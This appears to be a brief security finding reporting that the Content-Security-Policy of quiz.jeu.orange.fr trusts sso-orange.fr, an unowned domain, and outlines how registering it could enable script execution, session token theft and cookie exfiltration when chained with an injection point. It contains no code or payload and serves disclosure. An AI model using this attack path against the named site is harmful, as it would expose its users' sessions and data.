CSP Allowlist Misconfiguration

The Content-Security-Policy of quiz.jeu.orange.fr lists sso-orange.fr as a trusted script source. This domain is not owned by Orange. An attacker who registers it can serve arbitrary JavaScript that the browser will execute with full trust in the Orange context.

Session token theft, cookie exfiltration, localStorage access, and full script execution in the quiz.jeu.orange.fr origin. Requires chaining with an HTML/script injection point on the target page.